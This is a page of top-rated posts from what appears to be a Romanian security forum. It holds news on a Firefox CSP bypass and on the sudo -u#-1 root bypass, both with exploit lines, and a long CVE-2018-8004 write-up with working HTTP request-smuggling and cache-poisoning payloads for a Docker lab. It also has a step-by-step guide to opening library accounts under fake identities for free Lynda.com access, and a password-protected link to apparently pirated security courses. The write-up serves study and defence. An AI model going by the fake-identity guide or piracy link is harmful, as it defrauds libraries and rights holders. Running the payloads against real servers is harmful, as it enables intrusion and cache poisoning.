

Popular Content

Showing content with the highest reputation since 09/21/19 in Posts

  1. 4 points
    When I find the time I'll do a cleanup (without regard for the seniority or usefulness of the users who mock and swear). Even though it's not the best question, show some intelligence and give an answer that helps him understand how things work.
  2. 3 points
    A technique to evade Content Security Policy (CSP) leaves surfers using the latest version of Firefox vulnerable to cross-site scripting (XSS) exploits. Researcher Matheus Vrech uncovered a full-blown CSP bypass in the latest version of Mozilla's open source web browser that relies on using an object tag attached to a data attribute that points to a JavaScript URL. The trick allows potentially malicious content to bypass the CSP directive that would normally prevent such objects from being loaded.

Vrech developed proof-of-concept code that shows the trick working in the current version of Firefox (version 69). The Daily Swig was able to confirm that the exploit worked. The latest beta versions of Firefox are not vulnerable, as Vrech notes. Chrome, Safari, and Edge are unaffected. If left unaddressed, the bug could make it easier to execute certain XSS attacks that would otherwise be foiled by CSP.

The Daily Swig has invited Mozilla to comment on Vrech's find, which he hopes will earn recognition under the software developer's bug bounty program. The researcher told The Daily Swig how he came across the vulnerability. "I was playing ctf [capture the flag] trying to bypass a CSP without object-src CSP rule and testing some payloads I found this non intended (by anyone) way," he explained. "About the impact: everyone that was stuck in a bug bounty XSS due to CSP restrictions should have reported it by this time."

Content Security Policy is a technology set by websites and used by browsers that can block external resources and prevent XSS attacks. PortSwigger researcher Gareth Heyes discussed this and other aspects of browser security at OWASP's flagship European event late last month.

Source: https://portswigger.net/daily-swig/firefox-vulnerable-to-trivial-csp-bypass
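The article does not include Vrech's actual proof of concept, but the shape of the payload it describes can be sketched. Everything below is an assumption about that shape, not the published PoC: a policy with no object-src rule (so object loading falls back to default-src 'self') followed by an object tag whose data attribute is a javascript: URL, which Firefox 69 reportedly still executed.

```shell
# Hypothetical shape of the bypass (NOT the published PoC): with no
# object-src directive, object loading falls back to default-src 'self',
# which should refuse a javascript: URL in an <object> data attribute --
# yet Firefox 69 reportedly executed it anyway.
cat <<'EOF'
Content-Security-Policy: default-src 'self'

<object data="javascript:alert(document.domain)"></object>
EOF
```

In a patched Firefox, or in Chrome, Safari, and Edge, the fallback to default-src 'self' blocks the object's javascript: URL from ever running.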
  3. 3 points
    Source: Financial Times. Goodbye to cryptography as we know it? ...
  4. 3 points
    also 🤣🤣🤣🤣🤣🤣hahahahahahahahahahahahahahahaha
  5. 2 points
    1. Go to the Cuyahoga County Public Library website. 2. Click "My Account", then "Create Account". 3. Open Fake Name Generator. 4. Enter the data from Fake Name Generator into the Cuyahoga Library account, with two notes: use an Ohio postal code and an e-mail address you can actually access. 5. Check your e-mail and copy the Access Number, then log in to Cuyahoga County Public Library with just the Access Number; it will then ask you to create a 4-digit PIN. 6. Go to Lynda.com, select "Sign In", then select "Sign in with your organization portal". Enter the library's link there, then the Access Number and the PIN you just chose. And that's it, you have an account. If you have questions, ask me intelligently. If you already knew this, you can skip the topic. I don't know how long this lasts, but even a month of access is fine. It takes at most 5 minutes to set up everything explained above. Good luck. EDIT: It doesn't only work with the Cuyahoga Library. You can go to Free Library and pick a library from there, but choose one that issues cards online, with both an Access Number and a PIN.
  6. 2 points
    Sudo Flaw Lets Linux Users Run Commands As Root Even When They're Restricted Attention Linux Users! A new vulnerability has been discovered in Sudo—one of the most important, powerful, and commonly used utilities that comes as a core command installed on almost every UNIX and Linux-based operating system. The vulnerability in question is a sudo security policy bypass issue that could allow a malicious user or a program to execute arbitrary commands as root on a targeted Linux system even when the "sudoers configuration" explicitly disallows root access. Sudo, which stands for "superuser do," is a system command that allows a user to run applications or commands with the privileges of a different user without switching environments—most often, for running commands as the root user. By default on most Linux distributions, the ALL keyword in the RunAs specification in the /etc/sudoers file, as shown in the screenshot, allows all users in the admin or sudo groups to run any command as any valid user on the system. Reference Link : https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html?fbclid=IwAR1V9EZDp75uQdBgcQxV4t4C0THHguOtNkIk7o1PfapQPJEt9FaZmFK58Mg
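The mechanics of the flaw (CVE-2019-14287, fixed in sudo 1.8.28) can be sketched concretely. Sudo accepts numeric user IDs via -u#, and UID -1 (or its unsigned 32-bit twin, 4294967295) matches no entry in a "!root" blacklist, yet is passed straight to setresuid(), where -1 means "leave unchanged". The sudoers rule below is a hypothetical example of such a restricted configuration:

```shell
# Hypothetical sudoers rule meant to let "bob" run id as anyone EXCEPT root:
#
#   bob ALL = (ALL, !root) /usr/bin/id
#
# UID -1 slips past the !root check, but setresuid(-1) leaves the process
# at sudo's own UID 0, so on sudo < 1.8.28 the command runs as root:
#
#   sudo -u#-1 /usr/bin/id
#   sudo -u#4294967295 /usr/bin/id
#
# 4294967295 is simply -1 reinterpreted as an unsigned 32-bit integer:
echo $(( 4294967295 == 0xffffffff ))   # prints 1
```

Both spellings of the UID hit the same code path; the 1.8.28 fix makes sudo reject runas IDs that do not map to a real user.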
  7. 2 points
    Once you're in there, there's no escape, just so you know. I only survived a week there :)))
  8. 2 points
    Retro gaming console based on the Raspberry Pi 3 Model B - Kintaro Super Kuma 9000 case, with power on/off button, reset button, and fan - Raspberry Pi 3 Model B, with a 16GB Toshiba SD card - A good 3A 5V charger that does not undervolt. Both buttons are functional. The case has a fan installed, which runs when the board is under load; I even used Arctic MX-4 thermal paste for better temperatures. On the SD card I installed RetroPie and ROMs for various emulators. The system basically has everything you need on it to start playing. Price: 200 RON
  9. 2 points
  10. 2 points
    It's having problems with the NTP server
  11. 2 points
  12. 2 points
    A repair shop asked me 80 RON for this; to hell with that. You can fix it yourself in 3-5 hours and keep the money for a sandwich, cigarettes, and beer. Try https://forum.xda-developers.com/
  13. 1 point
  14. 1 point
    Right, bro @SynTAX, good thing you warned me. Here, @adytzu123456, I've posted an invitation code as hidden content so unregistered users can't see it; use it, because it expires in 24h.
  15. 1 point
    @aismen, see, the man wants an invitation. I thought you had one.
  16. 1 point
  17. 1 point
    1- Web Application Penetration Testing eXtreme (eWPTX)
----------------------------------------------------
03. Website_cloning.mp4
03. From_An_XSS_To_A_SQL_Injection.mp4
03. Keylogging.mp4
09. Advanced XXE Exploitation.MP4
07. Advanced_SecondOrder_SQL_Injection_Exploitation.mp4
05. Advanced_XSRF_Exploitation_part_i.mp4
06. Advanced_XSRF_Exploitation_part_ii.mp4
09. Advanced_Xpath_Exploitation.mp4
WAPTx sec 9.pdf
WAPTx sec 8.pdf
WAPTx sec 2.pdf
WAPTx sec 3.pdf
WAPTx sec 5.pdf
WAPTx sec 6.pdf
WAPTx sec 4.pdf
WAPTx sec 7.pdf
WAPTx sec 1.pdf

2- Penetration Testing Professional (ePTPv3)

3- Web Application Penetration Testing (eWAPT v2)
----------------------------------------------------
Penetration Testing Process
Introduction
Information Gathering
Cross Site Scripting
SQL Injection
Authentication and Authorization
Session Security
HTML5
File and Resources Attacks
Other Attacks
Web Services
XPath

https://mega.nz/#!484ByQRa!N7-wnQ3t5pMCavOvzh8-xMiMKSD2RARozRM99v17-8I
Pass: P8@Hu%vbg_&{}/2)p+4T
Source:
  18. 1 point
    Security: HTTP Smuggling, Apache Traffic Server
Sept 17, 2019. English write-up and security details of CVE-2018-8004 (August 2018 - Apache Traffic Server).

Contents:
What is this about?
Apache Traffic Server?
Fixed versions of ATS
CVE-2018-8004
Step by step Proof of Concept
  Set-up the lab: Docker instances
  Test That Everything Works
Request Splitting by Double Content-Length
Request Splitting by NULL Character Injection
Request Splitting using Huge Header, Early End-Of-Query
Cache Poisoning using Incomplete Queries and Bad Separator Prefix
  Attack schema
HTTP Response Splitting: Content-Length Ignored on Cache Hit
  Attack schema
Timeline
See also

English version (French version available on Makina Corpus). Estimated read time: 15 min, or really more.

What is this about?

This article gives a deep explanation of the HTTP Smuggling issues present in CVE-2018-8004. Firstly because there is currently not much information about it ("Undergoing Analysis" at the time of this writing on the previous link). Secondly, some time has passed since the official announcement (and even more since the availability of the fixes in v7), and mostly because I keep receiving questions about what exactly HTTP Smuggling is and how to test/exploit this type of issue; also because smuggling issues are now trending and easier to test, thanks to the great work of James Kettle (@albinowax).

So, this time, I'll give you not only details but also a step-by-step demo with some Dockerfiles to build your own test lab. You can use that test lab to experiment with manual raw queries, or to test the recently added Burp Suite smuggling tools. I'm a strong advocate of always searching for smuggling issues in non-production environments, for legal reasons and also to avoid unintended consequences (and we'll see in this article, with the last issue, that unintended behaviors can always happen).

Apache Traffic Server?

Apache Traffic Server, or ATS, is an Open Source HTTP load balancer and Reverse Proxy Cache.
It is based on a commercial product donated to the Apache Foundation. It's not related to the Apache httpd HTTP server; the "Apache" name comes from the Apache Foundation, and the code is very different from httpd's. If you were to search for ATS installations in the wild you would find some, hopefully fixed by now.

Fixed versions of ATS

As stated in the CVE announcement (2018-08-28), the impacted ATS versions are 6.0.0 to 6.2.2 and 7.0.0 to 7.1.3. Version 7.1.4 was released on 2018-08-02 and 6.2.3 on 2018-08-04. That's the official announcement, but I think 7.1.3 already contained most of the fixes and is maybe not vulnerable. The announcement was mostly delayed for the 6.x backports (and some other fixes for other issues were released at the same time). If you wonder about previous versions, like 5.x, they're out of support and quite certainly vulnerable. Do not use out-of-support versions.

CVE-2018-8004

The official CVE description is: "There are multiple HTTP smuggling and cache poisoning issues when clients making malicious requests interact with ATS." Which does not give a lot of pointers, but there's much more information in the 4 pull requests listed:

#3192: Return 400 if there is whitespace after the field name and before the colon
#3201: Close the connection when returning a 400 error response
#3231: Validate Content-Length headers for incoming requests
#3251: Drain the request body if there is a cache hit

If you have already studied some of my previous posts, some of these sentences might already seem dubious. For example, not closing the connection after a 400 error is clearly a fault based on the standards, but it is also a good catch for an attacker. Chances are that by crafting a bad message chain you may succeed in receiving a response for some queries hidden in the body of an invalid request. The last one, "Drain the request body if there is a cache hit", is the nicest one, as we will see in this article, and it was hard to detect.
My original report listed 5 issues:

HTTP request splitting using NULL character in header value
HTTP request splitting using huge header size
HTTP request splitting using double Content-Length headers
HTTP cache poisoning using extra space before the separator of header name and header value
HTTP request splitting using ... (no spoiler: I keep that for the end)

Step by step Proof of Concept

To understand the issues, and see the effects, we will be using a demonstration/research environment. If you want to test HTTP Smuggling issues you should really, really try to test them in a controlled environment. Testing issues on live environments would be difficult because:

You may have some very good HTTP agents (load balancers, SSL terminators, security filters) between you and your target, hiding most of your successes and errors.
You may trigger errors and behaviors that you have no idea about. For example, I encountered random, unreproducible errors on several fuzzing tests (on test envs) before understanding that they were related to the last smuggling issue we will study in this article. Effects were delayed to subsequent tests, and I was not in control at all.
You may trigger errors on requests sent by other users, and/or for other domains. That's not like testing a self-reflected XSS; you could end up in court for that.

Real-life complete examples usually occur through interactions between several different HTTP agents, like Nginx + Varnish, or ATS + HaProxy, or Pound + IIS + Node.js, etc. You will have to understand how each actor interacts with the others, and you will see it faster with a local low-level network capture than blindly across an unknown chain of agents (for example, when learning how to detect each agent in such a chain). So it's very important to be able to rebuild a laboratory environment.
And, if you find something, this environment can then be used to send detailed bug reports to the program owners (in my own experience, it can sometimes be quite difficult to explain the issues; a working demo helps).

Set-up the lab: Docker instances

We will run two Apache Traffic Server instances, one in version 6.x and one in version 7.x. To add some variety, and potential smuggling issues, we will also add an Nginx docker and an HaProxy one. Four HTTP actors, each one on a local port:

8001: HaProxy (internally listening on port 80)
8002: Nginx (internally listening on port 80)
8007: ATS7 (internally listening on port 8080)
8006: ATS6 (internally listening on port 8080); most examples will use ATS7, but you will be able to test this older version simply by using this port instead of the other (and altering the domain).

We will chain some reverse proxy relations: Nginx will be the final backend, HaProxy the front load balancer, and between Nginx and HaProxy we will go through ATS6 or ATS7 based on the domain name used (dummy-host7.example.com for ATS7 and dummy-host6.example.com for ATS6).

Note that the localhost port mappings of the ATS and Nginx instances are not directly needed: if you can inject a request into HaProxy, it will reach Nginx internally via port 8080 of one of the ATS instances and port 80 of Nginx. But they can be useful if you want to target one of the servers directly, and we will have to avoid the HaProxy part in most examples, because most attacks would be blocked by this load balancer. So most examples will directly target the ATS7 server first, on 8007. Later you can try to succeed targeting 8001; that will be harder.
                  +---[80]---+
                  | 8001->80 |
                  | HaProxy  |
                  |          |
                  +--+---+---+
[dummy-host6.example.com]  |   |  [dummy-host7.example.com]
            +--------------+   +--------------+
            |                                 |
     +-[8080]-----+                    +-[8080]-----+
     | 8006->8080 |                    | 8007->8080 |
     |    ATS6    |                    |    ATS7    |
     |            |                    |            |
     +-----+------+                    +----+-------+
           |                                |
           +---------------+----------------+
                           |
                      +--[80]----+
                      | 8002->80 |
                      |  Nginx   |
                      |          |
                      +----------+

To build this cluster we will use docker-compose. You can find the docker-compose.yml file here, but the content is quite short:

version: '3'

services:
  haproxy:
    image: haproxy:1.6
    build:
      context: .
      dockerfile: Dockerfile-haproxy
    expose:
      - 80
    ports:
      - "8001:80"
    links:
      - ats7:linkedats7.net
      - ats6:linkedats6.net
    depends_on:
      - ats7
      - ats6
  ats7:
    image: centos:7
    build:
      context: .
      dockerfile: Dockerfile-ats7
    expose:
      - 8080
    ports:
      - "8007:8080"
    depends_on:
      - nginx
    links:
      - nginx:linkednginx.net
  ats6:
    image: centos:7
    build:
      context: .
      dockerfile: Dockerfile-ats6
    expose:
      - 8080
    ports:
      - "8006:8080"
    depends_on:
      - nginx
    links:
      - nginx:linkednginx.net
  nginx:
    image: nginx:latest
    build:
      context: .
      dockerfile: Dockerfile-nginx
    expose:
      - 80
    ports:
      - "8002:80"

To make this work you will also need the 4 specific Dockerfiles:

Dockerfile-haproxy: an HaProxy Dockerfile, with the right conf
Dockerfile-nginx: a very simple Nginx Dockerfile with one index.html page
Dockerfile-ats7: an ATS 7.1.1 compiled-from-archive Dockerfile
Dockerfile-ats6: an ATS 6.2.2 compiled-from-archive Dockerfile

Put all these files (the docker-compose.yml and the Dockerfile-* files) into a working directory and run in this dir:

docker-compose build && docker-compose up

You can now take a big break; you are launching two compilations of ATS. Hopefully the next time an up will be enough, and even the build may not redo the compilation steps. You can easily add another ats7-fixed element to the cluster to test a fixed version of ATS if you want. For now we will concentrate on detecting issues in the flawed versions.
Test That Everything Works

We will run basic, non-attacking queries on this installation to check that everything is working, and to train ourselves in the printf + netcat way of running queries. We will not use curl or wget to run the HTTP queries, because with those tools it would be impossible to write bad queries. So we need low-level string manipulation (with printf, for example) and socket handling (with netcat -- or nc).

Test Nginx (that's a one-liner, split for readability):

printf 'GET / HTTP/1.1\r\n'\
'Host:dummy-host7.example.com\r\n'\
'\r\n'\
| nc 127.0.0.1 8002

You should get the index.html response, something like:

HTTP/1.1 200 OK
Server: nginx/1.15.5
Date: Fri, 26 Oct 2018 15:28:20 GMT
Content-Type: text/html
Content-Length: 120
Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT
Connection: keep-alive
ETag: "5bd321bc-78"
X-Location-echo: /
X-Default-VH: 0
Cache-Control: public, max-age=300
Accept-Ranges: bytes

$<html><head><title>Nginx default static page</title></head>
<body><h1>Hello World</h1>
<p>It works!</p>
</body></html>

Then test ATS7 and ATS6:

printf 'GET / HTTP/1.1\r\n'\
'Host:dummy-host7.example.com\r\n'\
'\r\n'\
| nc 127.0.0.1 8007

printf 'GET / HTTP/1.1\r\n'\
'Host:dummy-host6.example.com\r\n'\
'\r\n'\
| nc 127.0.0.1 8006

Then test HaProxy; altering the Host name should make the query transit via ATS7 or ATS6 (check the Server: header in the response):

printf 'GET / HTTP/1.1\r\n'\
'Host:dummy-host7.example.com\r\n'\
'\r\n'\
| nc 127.0.0.1 8001

printf 'GET / HTTP/1.1\r\n'\
'Host:dummy-host6.example.com\r\n'\
'\r\n'\
| nc 127.0.0.1 8001

And now let's start the more complex HTTP stuff: we will make an HTTP pipeline, pipelining several queries and receiving several responses, as pipelining is the root of most smuggling attacks:

# send one pipelined chain of queries
printf 'GET /?cache=1 HTTP/1.1\r\n'\
'Host:dummy-host7.example.com\r\n'\
'\r\n'\
'GET /?cache=2 HTTP/1.1\r\n'\
'Host:dummy-host7.example.com\r\n'\
'\r\n'\
'GET /?cache=3 HTTP/1.1\r\n'\
'Host:dummy-host6.example.com\r\n'\
'\r\n'\
'GET /?cache=4 HTTP/1.1\r\n'\
'Host:dummy-host6.example.com\r\n'\
'\r\n'\
| nc 127.0.0.1 8001

This is pipelining; it's not just HTTP keep-alive, because we send the chain of queries without waiting for the responses. See my previous post for details on keep-alive and pipelining. You should see the Nginx access log in the docker-compose output. If you do not rotate some arguments in the queries, Nginx won't be reached by your requests, because ATS is already caching the result (CTRL+C on the docker-compose output and a new docker-compose up will remove any cache).

Request Splitting by Double Content-Length

Let's start the real play. That's the 101 of HTTP Smuggling: the easy vector. Double Content-Length header support is strictly forbidden by RFC 7230, section 3.3.3 (bold added):

"If a message is received without Transfer-Encoding and with either multiple Content-Length header fields having differing field-values or a single Content-Length header field having an invalid value, then the message framing is invalid and the recipient MUST treat it as an unrecoverable error. If this is a request message, the server MUST respond with a 400 (Bad Request) status code and then close the connection. If this is a response message received by a proxy, the proxy MUST close the connection to the server, discard the received response, and send a 502 (Bad Gateway) response to the client. If this is a response message received by a user agent, the user agent MUST close the connection to the server and discard the received response."

Differing interpretations of message length based on the order of Content-Length headers were among the first demonstrated HTTP smuggling attacks (2005).
Sending such a query directly to ATS generates 2 responses (one 400 and one 200):

printf 'GET /index.html?toto=1 HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'Content-Length: 0\r\n'\
'Content-Length: 66\r\n'\
'\r\n'\
'GET /index.html?toto=2 HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'\r\n'\
|nc -q 1 127.0.0.1 8007

The regular response should be a single 400 error. Using port 8001 (HaProxy) would not work: HaProxy is a robust HTTP agent and cannot be fooled by such an easy trick. This is critical request splitting -- classical, but hard to reproduce in a real-life environment if some robust tools are used in the reverse proxy chain.

So why critical? Because you could also consider ATS to be robust, use a new, unknown HTTP server behind or in front of ATS, and expect such smuggling attacks to be properly detected. And there is another factor of criticality: any other issue in HTTP parsing can exploit this double Content-Length. Let's say you have another issue which hides one header from all other HTTP actors but reveals it to ATS. Then you just have to use this hidden header for a second Content-Length and you're done, without being blocked by a previous actor. In our current case, ATS, you have one example of such a hidden-header issue with the 'space-before-:' trick that we will analyze later.

Request Splitting by NULL Character Injection

This example is not the easiest one to understand (go to the next one if you do not get it, or even the one after that), and it's also not the biggest impact, as we will use a really bad query to attack, easily detected. But I love the magical NULL (\0) character. Using a NULL byte in a header triggers a query rejection on ATS -- that's OK -- but also a premature end of query, and if you do not close the pipeline after a first error, bad things can happen: the next line is interpreted as the next query in the pipeline.
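As a quick sanity check on the numbers above (a measurement only, runnable anywhere without the lab): the second Content-Length value, 66, is exactly the byte size of the hidden /index.html?toto=2 query. An agent honoring the second header swallows those 66 bytes as a body, while an agent honoring Content-Length: 0 parses them as the next pipelined request.

```shell
# The hidden query measures exactly 66 bytes, matching the second
# Content-Length header of the attack query above:
printf 'GET /index.html?toto=2 HTTP/1.1\r\nHost: dummy-host7.example.com\r\n\r\n' | wc -c
# -> 66
```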
So a valid (almost, if you except the NULL character) pipeline like this one:

01 GET /does-not-exists.html?foofoo=1 HTTP/1.1\r\n
02 X-Something: \0 something\r\n
03 X-Foo: Bar\r\n
04 \r\n
05 GET /index.html?bar=1 HTTP/1.1\r\n
06 Host: dummy-host7.example.com\r\n
07 \r\n

generates two 400 errors, because the second query starts with X-Foo: Bar\r\n, and that's an invalid first query line. Let's test an invalid pipeline (as there is no \r\n between the 2 queries):

01 GET /does-not-exists.html?foofoo=2 HTTP/1.1\r\n
02 X-Something: \0 something\r\n
03 GET /index.html?bar=2 HTTP/1.1\r\n
04 Host: dummy-host7.example.com\r\n
05 \r\n

It generates one 400 error and one 200 OK response. Lines 03/04/05 are taken as a valid query. This is already an HTTP request splitting attack. But line 03 is a really bad header line that most agents would reject; you cannot read it as a valid unique query, and the fake pipeline would be detected early as a bad query, since line 03 is clearly not a valid header line:

GET /index.html?bar=2 HTTP/1.1\r\n
!= <HEADER-NAME-NO-SPACE>[:][SP]<HEADER-VALUE>[CR][LF]

For the first line the syntax is one of these two forms:

<METHOD>[SP]<LOCATION>[SP]HTTP/[M].[m][CR][LF]
<METHOD>[SP]<http[s]://LOCATION>[SP]HTTP/[M].[m][CR][LF] (absolute URI)

LOCATION may be used to inject the special [:] that is required in a header line, especially in the query string part, but this would inject a lot of bad characters into the HEADER-NAME-NO-SPACE part, like '/' or '?'. Let's try the absolute-URI alternative syntax, where the [:] comes earlier on the line and the only bad character for a header name would be the space. This will also fix the potential presence of a double Host header (an absolute URI replaces the Host header).
01 GET /does-not-exists.html?foofoo=2 HTTP/1.1\r\n
02 Host: dummy-host7.example.com\r\n
03 X-Something: \0 something\r\n
04 GET http://dummy-host7.example.com/index.html?bar=2 HTTP/1.1\r\n
05 \r\n

Here the bad header which becomes a query is line 04, with a header name of GET http and a header value of //dummy-host7.example.com/index.html?bar=2 HTTP/1.1. That's still an invalid header (the header name contains a space), but I'm pretty sure we could find some HTTP agents transferring this header (ATS is one proof of that: space characters in header names were allowed). A real attack using this trick looks like this:

printf 'GET /something.html?zorg=1 HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'X-Something: "\0something"\r\n'\
'GET http://dummy-host7.example.com/index.html?replacing=1&zorg=2 HTTP/1.1\r\n'\
'\r\n'\
'GET /targeted.html?replaced=maybe&zorg=3 HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'\r\n'\
|nc -q 1 127.0.0.1 8007

This is just 2 queries (the first one has 2 bad headers: one with a NULL, one with a space in the header name); for ATS it's 3 queries. The regular second one (/targeted.html) -- third for ATS -- will get the response of the hidden query (http://dummy-host7.example.com/index.html?replacing=1&zorg=2); check the X-Location-echo: header added by Nginx. After that, ATS adds a third response, a 404, but the previous actor expects only 2 responses, and the second response has already been replaced.

HTTP/1.1 400 Invalid HTTP Request
Date: Fri, 26 Oct 2018 15:34:53 GMT
Connection: keep-alive
Server: ATS/7.1.1
Cache-Control: no-store
Content-Type: text/html
Content-Language: en
Content-Length: 220

<HTML> <HEAD> <TITLE>Bad Request</TITLE> </HEAD> <BODY BGCOLOR="white" FGCOLOR="black"> <H1>Bad Request</H1> <HR> <FONT FACE="Helvetica,Arial"><B> Description: Could not process this request.
</B></FONT> <HR> </BODY>

Then:

HTTP/1.1 200 OK
Server: ATS/7.1.1
Date: Fri, 26 Oct 2018 15:34:53 GMT
Content-Type: text/html
Content-Length: 120
Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT
ETag: "5bd321bc-78"
X-Location-echo: /index.html?replacing=1&zorg=2
X-Default-VH: 0
Cache-Control: public, max-age=300
Accept-Ranges: bytes
Age: 0
Connection: keep-alive

$<html><head><title>Nginx default static page</title></head>
<body><h1>Hello World</h1>
<p>It works!</p>
</body></html>

And then the extra unused response:

HTTP/1.1 404 Not Found
Server: ATS/7.1.1
Date: Fri, 26 Oct 2018 15:34:53 GMT
Content-Type: text/html
Content-Length: 153
Age: 0
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body>
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.15.5</center>
</body>
</html>

If you try to use port 8001 (so transiting via HaProxy) you will not get the expected attack result; that attacking query is really too bad:

HTTP/1.0 400 Bad request
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html><body><h1>400 Bad request</h1>
Your browser sent an invalid request.
</body></html>

That's an HTTP request splitting attack, but real-world usage may be hard to find. The fix in ATS is the 'close on error': when a 400 error is triggered, the pipeline is stopped and the socket is closed after the error.

Request Splitting using Huge Header, Early End-Of-Query

This attack is almost the same as the previous one, but it does not need the magical NULL character to trigger the end-of-query event. By using headers with a size around 65536 characters we can trigger this event, and exploit it the same way as with the NULL premature end of query.

A note on huge header generation with printf. Here I'm generating a query with one header containing a lot of repeated characters (= or 1, for example):

X: ==============( 65 532 '=' )========================\r\n

You can use the %ns form in printf to generate this, generating a big number of spaces.
But to do that we need to replace some special characters with tr, and use _ instead of spaces in the original string:

printf 'X:_"%65532s"\r\n' | tr " " "=" | tr "_" " "

Try it against Nginx:

printf 'GET_/something.html?zorg=6_HTTP/1.1\r\n'\
'Host:_dummy-host7.example.com\r\n'\
'X:_"%65532s"\r\n'\
'GET_http://dummy-host7.example.com/index.html?replaced=0&cache=8_HTTP/1.1\r\n'\
'\r\n'\
|tr " " "1"\
|tr "_" " "\
|nc -q 1 127.0.0.1 8002

I get one 400 error; that's the normal stuff, Nginx does not like huge headers. Now try it against ATS7:

printf 'GET_/something.html?zorg2=5_HTTP/1.1\r\n'\
'Host:_dummy-host7.example.com\r\n'\
'X:_"%65534s"\r\n'\
'GET_http://dummy-host7.example.com/index.html?replaced=0&cache=8_HTTP/1.1\r\n'\
'\r\n'\
|tr " " "1"\
|tr "_" " "\
|nc -q 1 127.0.0.1 8007

And after the 400 error we get a 200 OK response. Same problem as in the previous example, and same fix. Here we still have a query with a bad header containing a space, and also one quite big header, but we do not have the NULL character. But, yeah, 65,000 characters is very big; most actors would reject a query after 8,000 characters on one line.

HTTP/1.1 400 Invalid HTTP Request
Date: Fri, 26 Oct 2018 15:40:17 GMT
Connection: keep-alive
Server: ATS/7.1.1
Cache-Control: no-store
Content-Type: text/html
Content-Language: en
Content-Length: 220

<HTML> <HEAD> <TITLE>Bad Request</TITLE> </HEAD> <BODY BGCOLOR="white" FGCOLOR="black"> <H1>Bad Request</H1> <HR> <FONT FACE="Helvetica,Arial"><B> Description: Could not process this request.
</B></FONT> <HR> </BODY>

HTTP/1.1 200 OK
Server: ATS/7.1.1
Date: Fri, 26 Oct 2018 15:40:17 GMT
Content-Type: text/html
Content-Length: 120
Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT
ETag: "5bd321bc-78"
X-Location-echo: /index.html?replaced=0&cache=8
X-Default-VH: 0
Cache-Control: public, max-age=300
Accept-Ranges: bytes
Age: 0
Connection: keep-alive

$<html><head><title>Nginx default static page</title></head>
<body><h1>Hello World</h1>
<p>It works!</p>
</body></html>

Cache Poisoning using Incomplete Queries and Bad Separator Prefix

Cache poisoning -- that sounds great. In smuggling attacks you only have to trigger a request or response splitting attack to prove a defect, but when you push that to cache poisoning, people usually understand better why split pipelines are dangerous.

ATS supports an invalid header syntax:

HEADER[SPACE]:HEADER VALUE\r\n

That does not conform to RFC 7230, section 3.2: "Each header field consists of a case-insensitive field name followed by a colon (":"), optional leading whitespace, the field value, and optional trailing whitespace." So:

HEADER:HEADER_VALUE\r\n => OK
HEADER:[SPACE]HEADER_VALUE\r\n => OK
HEADER:[SPACE]HEADER_VALUE[SPACE]\r\n => OK
HEADER[SPACE]:HEADER_VALUE\r\n => NOT OK

And RFC 7230, section 3.2.4 adds (bold added): "No whitespace is allowed between the header field-name and colon. In the past, differences in the handling of such whitespace have led to security vulnerabilities in request routing and response handling. A server MUST reject any received request message that contains whitespace between a header field-name and colon with a response code of 400 (Bad Request). A proxy MUST remove any such whitespace from a response message before forwarding the message downstream."

ATS will interpret the bad header, and also forward it without alteration.
Using this flaw we can add headers to our request that are invalid for any valid HTTP agent but are still interpreted by ATS, like:

Content-Length :77\r\n

Or (try it as an exercise):

Transfer-encoding :chunked\r\n

Some HTTP servers will effectively reject such a message with a 400 error. But some will simply ignore the invalid header; that's the case with Nginx, for example. ATS will maintain a keep-alive connection to the Nginx backend, so we'll use this ignored header to transmit a body (ATS thinks it's a body) that is in fact a new query for the backend. And we'll make this query incomplete (missing a CRLF at the end of the headers) to absorb a future query sent to Nginx. This sort of incomplete query, completed by the next incoming query, is also a basic smuggling technique demonstrated 13 years ago.

01 GET /does-not-exists.html?cache=x HTTP/1.1\r\n
02 Host: dummy-host7.example.com\r\n
03 Cache-Control: max-age=200\r\n
04 X-info: evil 1.5 query, bad CL header\r\n
05 Content-Length :117\r\n
06 \r\n
07 GET /index.html?INJECTED=1 HTTP/1.1\r\n
08 Host: dummy-host7.example.com\r\n
09 X-info: evil poisoning query\r\n
10 Dummy-incomplete:

Line 05 is invalid (' :'), but for ATS it is valid. Lines 07/08/09/10 are just binary body data for ATS, transmitted to the backend. For Nginx: Line 05 is ignored. Line 07 is a new request (and the first response is returned). Line 10 has no "\r\n", so Nginx is still waiting for the end of this query, on the keep-alive connection opened by ATS ...
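A quick byte count shows where the value 117 comes from (a measurement sketch only; it uses the Dummy-unterminated: header name from the actual attack script further down, since the shorter Dummy-incomplete: name in the listing above would give a smaller total):

```shell
# The smuggled half-query is exactly 117 bytes, matching the
# "Content-Length :117" header that only ATS interprets. The last header
# deliberately has no value and no trailing \r\n, so the backend keeps
# waiting for more bytes:
printf 'GET /index.html?INJECTED=1 HTTP/1.1\r\nHost: dummy-host7.example.com\r\nX-info: evil poisoning query\r\nDummy-unterminated:' | wc -c
# -> 117
```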
Attack schema [ATS Cache poisoning - space before header separator + backend ignoring bad headers]

Innocent        Attacker          ATS             Nginx
    |               |               |               |
    |               |--A(1A+1/2B)-->|               | * Issue 1 & 2 *
    |               |               |--A(1A+1/2B)-->| * Issue 3 *
    |               |               |<-A(404)-------|
    |               |               |          [1/2B]
    |               |<-A(404)-------|          [1/2B]
    |               |--C----------->|          [1/2B]
    |               |               |--C----------->| * ending B *
    |               |          [*CP*]<--B(200)------|
    |               |<--B(200)------|               |
    |--C--------------------------->|               |
    |<--B(200)--------------------[HIT]             |

1A + 1/2B means request A + an incomplete query B
A(X) means query X is hidden in the body of query A
CP : Cache poisoning
Issue 1 : ATS transmits 'header[SPACE]: Value', a bad HTTP header.
Issue 2 : ATS interprets this bad header as valid (so 1/2B stays hidden in the body).
Issue 3 : Nginx encounters the bad header but ignores it instead of sending a 400 error. So 1/2B is discovered as a new query (no Content-Length).
Request B contains an incomplete header (no CRLF).
Ending B: the first line of query C ends the incomplete header of query B; all of C's other headers are added to B. C disappears, and C's HTTP credentials are mixed into all the previous B headers (cookie/bearer token/Host, etc.).

